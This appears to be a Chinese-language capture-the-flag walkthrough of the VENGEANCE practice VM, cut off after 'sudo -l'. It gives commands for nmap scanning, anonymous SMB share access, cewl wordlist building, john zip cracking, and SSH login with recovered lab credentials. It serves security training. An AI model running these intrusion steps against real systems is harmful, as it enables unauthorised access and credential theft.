digitalworld.local: VENGEANCE靶场
1,将两台虚拟机网络连接都改为NAT模式
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.23.0/24
那么攻击机IP为192.168.23.182,靶场IP192.168.23.3
3,对靶机进行端口服务探测
nmap -sV -T4 -p- -A 192.168.23.3
| 端口号 | 协议 | 状态 | 服务名称 | 版本/详细信息 |
| 80 | tcp | open | http | nginx 1.18.0 (Ubuntu) 网站标题:VENGEANCE 运行用户:www-data |
| 443 | tcp | open | ssl/http | nginx 1.18.0 (Ubuntu) SSL 证书有效期:2021-02-14 至 2022-02-14 支持协议:h2/http1.1 |
| 139 | tcp | open | netbios-ssn | Samba smbd 4.6.2 运行用户:root |
| 445 | tcp | open | netbios-ssn | Samba smbd 4.6.2 运行用户:root |
| 113 | tcp | open | ident? | 身份验证服务(可能) 运行用户:root |
| 143 | tcp | open | imap? | 邮件访问协议(可能) |
| 993 | tcp | open | imaps? | 加密的IMAP协议(可能) |
| 995 | tcp | open | pop3s? | 加密的POP3协议(可能) |
| 22222 | tcp | open | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 支持密钥类型:RSA/ECDSA/ED25519 |
4,起手先访问一下80端口存在的http服务,直接使用IP访问缓慢,需要修改host文件添加一条域名解析
echo "192.168.23.3 vengeance.goodtech.inc" >>/etc/hosts
http://vengeance.goodtech.inc/
然后就是扫描一下目录:
dirsearch -u http://vengeance.goodtech.inc -x 404,403
5,用 enum4linux扫描一下:
enum4linux 192.168.23.3
smbclient -N \\\\192.168.23.3\\sarapublic$
gio.zip打开需要密码
密码应该隐藏在上面下载的那几个文件里,先把那几个文件做成密码本,使用cewl字典生成工具生成密码本,先在本地开启个 http 服务,然后利用cewl爬取文件关键字生成密码本:
cewl 192.168.23.3:8000/blurb.txt >> pass.txt
cewl 192.168.23.3:8000/eaurouge >> pass.txt
cewl 192.168.23.3:8000/eaurouge.txt >> pass.txt
cewl 192.168.23.3:8000/essay.txt >> pass.txt
cewl 192.168.23.3:8000/profile.txt >> pass.txt
cewl 192.168.23.3:8000/to-do >> pass.txt
利用生成的密码本爆破一下 zip 文件:
john --wordlist=pass.txt password.txt
nanotechnological
6,使用获得账户和密码信息:qinyi/giovanni_130R_Suzuka,进行ssh登录,成功获得shell权限
ssh qinyi@192.168.23.3 -p 22222
信息收集一下
看一下如何sudo提权 sudo -l
